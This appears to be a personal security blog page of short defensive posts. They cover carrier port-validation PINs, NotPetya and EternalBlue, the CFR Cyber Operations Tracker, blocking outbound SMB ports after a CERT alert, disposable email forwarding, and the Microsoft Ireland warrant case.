Port Validation Passcode or Prevent SIM hijacking

Do you have a Port Validation passcode setup on your mobile/wireless account?  If not something you may want to consider…

Does AT&T support such a feature?

To reduce the risk of this happening to you if you’re a T-Mobile customer, call 611 from your cellphone or 1-800-937-8997 and tell a support staffer that you want to create a “port validation” passcode. This is also called a phone passcode or PIN, depending on your provider (most US providers offer this feature now). Motherboard confirmed that Sprint, T-Mobile, Verizon and U.S. Cellular all give customers this option. 

NotPetya: Russian military or NSA ?

There’s a new WaPo article describing how Russian military hackers were behind the NotPetya malware that targeted Ukraine but also affected global companies, putting lost revenue of US companies in the high-hundreds of millions of dollars.

Considering NotPetya used the EternalBlue exploit which was hoarded by a US three letter agency….are the Russians really to blame?  Hopefully the updated Vulnerabilities Equity Program will prevent future vulnerabilities discovered by US intelligence agencies from being used against us.

gadgets vs. process innovations

In the 1980s, defenders had to invent computer emergency response teams. In the 1990s, it was an innovation to have a chief information security officer to centralize authority or build an information sharing and analysis center to share and collaborate with peers. In the 2010s, the idea of a cyber kill chain changed how defenders conceptualize their job. Further improving operational coordination―through response playbooks, frequent exercises, and groups like information sharing and analysis organizations―can be an inexpensive way to build significant capability. Such revolutionary innovations have a very modest cost yet are often overlooked in favor of the newest technological gadgets.

from: Building a Defensible Cyberspace

APT Tracker

There’s a lot of different campaign and actor names and it’s tough to keep them all straight — just see here.

The Council on Foreign Relations released a new tool, the Cyber Operations Tracker.  The tool is a database of the publicly known state-sponsored cyber incidents that have occurred since 2005.  The database contains almost two hundred entries of state-sponsored cyber incidents or threat actors for which data is publicly available. Want to know who is spying on whom? Looking for the number of times North Korea has been publicly denounced for its cyber operations? Heard of Equation Group but would like to know more about it? The tracker can help answer all of these questions.

I should also mention Google and Arbor Networks partnered up a while ago to create the Digital Attack Map however its focus is on DDOS attacks.


Disable 445 outbound

Just a friendly reminder to make sure you’re only allowing port 80, 443, and maybe 8080 outbound from your network.  According to this recent US CERT alert advanced attackers are using email attachments to leverage legitimate Microsoft Office functions to retrieve a document from a remote server using the Server Message Block (SMB) protocol.  This sends the user’s credential hash to the remote server prior to retrieving the requested file. (Note: It is not necessary for the file to be retrieved for the transfer of credentials to occur.) The threat actors then likely used password-cracking techniques to obtain the plaintext password.

TCP ports 445 or 139 and UDP ports 137 or 138 (SMB) should only be allowed internally !!!


SpamGourmet & Fiddler

If you don’t use SpamGourmet or a similar service I highly recommend them.  They allow you to create unlimited e-mail forwarding addresses that can be created on-the-fly — allowing you to easily detect which websites are giving out your information.  Definitely get an account if you don’t have such a tactic already!

Fiddler, a great Windows (web) proxy gave out e-mail address.  I’m sure it was in their terms of service that I didn’t bother reading.  Still disappointing.

United States v. Microsoft Primer

There’s a great summary of the government’s case against Microsoft concerning the subpoenaing ability of data (email) residing in an overseas data center controlled by a US company.   The crux of the dispute is the territorial reach (and territorial applicability) of the Stored Communications Act (SCA), a subset of the Electronic Communications Privacy Act (ECPA) that governs law enforcement access to communications data.

The dispute arose when the Justice Department brought a warrant to Microsoft – issued based upon probable cause under the SCA (18 U.S.C. § 2703) – asking for the details and contents of an email account believed to be associated with a suspected drug trafficker.

Microsoft produced the transactional records it held on its data centers in the United States, but declined to produce the customer’s emails that it said were stored on a data center in Ireland.

HT: https://lawfareblog.com/primer-microsoft-ireland-supreme-courts-extraterritorial-warrant-case